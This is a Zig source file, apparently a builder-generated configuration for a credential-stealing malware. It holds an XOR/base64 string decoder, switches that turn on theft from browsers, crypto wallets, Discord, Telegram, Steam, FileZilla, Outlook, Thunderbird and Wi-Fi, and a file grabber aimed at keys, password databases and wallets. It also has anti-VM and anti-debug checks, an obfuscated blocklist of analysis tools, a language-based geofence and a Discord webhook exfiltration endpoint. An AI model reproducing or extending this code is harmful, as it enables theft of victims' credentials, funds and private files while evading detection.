const std = @import("std");
const obf = @import("obf.zig");

// Generated by the builder — do not edit manually

pub const obf_key = [_]u8{ 0x4b, 0x37, 0xd2, 0x8f, 0x1c, 0xa5, 0x6e, 0x93, 0x0f, 0x5a, 0xc8, 0x21, 0x7d, 0xe4, 0x19, 0xb6 };

pub fn decAlloc(allocator: std.mem.Allocator, s: []const u8) ![]u8 {
    if (s.len == 0) return allocator.alloc(u8, 0);

    const decoded_len = try std.base64.standard.Decoder.calcSizeForSlice(s);
    const decoded = try allocator.alloc(u8, decoded_len);
    errdefer allocator.free(decoded);

    try std.base64.standard.Decoder.decode(decoded, s);

    for (decoded, 0..) |*b, i| {
        b.* = b.* ^ obf_key[i % obf_key.len];
    }
    return decoded;
}


// ---- Module switches ----
pub const roubar_navegadores = true;
pub const roubar_crypto = true;
pub const roubar_discord = true;
pub const roubar_telegram = true;
pub const roubar_steam = true;
pub const roubar_filezilla = true;
pub const roubar_outlook = true;
pub const roubar_thunderbird = true;
pub const roubar_wifi = true;
pub const pegador_arquivos = true;
pub const tirar_captura = true;
pub const coletar_info_sistema = true;
pub const anti_vm = true;
pub const anti_debug = true;
pub const human_interaction = true;
pub const persistir = false;
pub const auto_destruir = false;

// ---- Geofence: abort on any of these host langids ----
pub const geofence_langids = [_]u16{ 0x0419, 0x0422, 0x0423 };

// ---- File grabber ----
pub const tamanho_max_arquivo: i64 = 5242880;
pub const max_screenshot_size: usize = 10 * 1024 * 1024;

pub const extensoes_arquivo_obf = [_][]const u8{
    &obf.xorStr(".txt"),
    &obf.xorStr(".doc"),
    &obf.xorStr(".docx"),
    &obf.xorStr(".xls"),
    &obf.xorStr(".xlsx"),
    &obf.xorStr(".pdf"),
    &obf.xorStr(".json"),
    &obf.xorStr(".csv"),
    &obf.xorStr(".db"),
    &obf.xorStr(".sqlite"),
    &obf.xorStr(".key"),
    &obf.xorStr(".pem"),
    &obf.xorStr(".ppk"),
    &obf.xorStr(".kdbx"),
    &obf.xorStr(".rdp"),
    &obf.xorStr(".ovpn"),
    &obf.xorStr(".conf"),
    &obf.xorStr(".wallet"),
    &obf.xorStr(".dat"),
};

pub const caminhos_pegador_obf = [_][]const u8{
    &obf.xorStr("Desktop"),
    &obf.xorStr("Documents"),
    &obf.xorStr("Downloads"),
};

pub fn getExtensoes(allocator: std.mem.Allocator) ![][]u8 {
    var result = try allocator.alloc([]u8, extensoes_arquivo_obf.len);
    for (extensoes_arquivo_obf, 0..) |ext, i| {
        result[i] = try obf.dexor(allocator, ext);
    }
    return result;
}

pub fn getCaminhos(allocator: std.mem.Allocator) ![][]u8 {
    var result = try allocator.alloc([]u8, caminhos_pegador_obf.len);
    for (caminhos_pegador_obf, 0..) |p, i| {
        result[i] = try obf.dexor(allocator, p);
    }
    return result;
}


// ---- Process blocklist: abort if any of these is running ----
pub const process_blocklist_obf = [_][]const u8{
    &obf.xorStr("vmtoolsd.exe"),
    &obf.xorStr("vmwaretray.exe"),
    &obf.xorStr("vmwareuser.exe"),
    &obf.xorStr("vboxservice.exe"),
    &obf.xorStr("vboxtray.exe"),
    &obf.xorStr("xenservice.exe"),
    &obf.xorStr("qemu-ga.exe"),
    &obf.xorStr("sandboxiedcomlaunch.exe"),
    &obf.xorStr("sandboxierpcss.exe"),
    &obf.xorStr("sbiectrl.exe"),
    &obf.xorStr("cuckoomon.exe"),
    &obf.xorStr("cuckooagent.exe"),
    &obf.xorStr("wireshark.exe"),
    &obf.xorStr("procmon.exe"),
    &obf.xorStr("procmon64.exe"),
    &obf.xorStr("x64dbg.exe"),
    &obf.xorStr("x32dbg.exe"),
    &obf.xorStr("ollydbg.exe"),
    &obf.xorStr("fiddler.exe"),
    &obf.xorStr("httpdebugger.exe"),
    &obf.xorStr("ida.exe"),
    &obf.xorStr("ida64.exe"),
    &obf.xorStr("ghidrarun.exe"),
};

// ---- Exfiltration endpoint ----
pub const webhook_host_obf = &obf.xorStr("discord.com");
pub const webhook_path_obf = &obf.xorStr("/api/webhooks/YOUR_ID/YOUR_TOKEN");
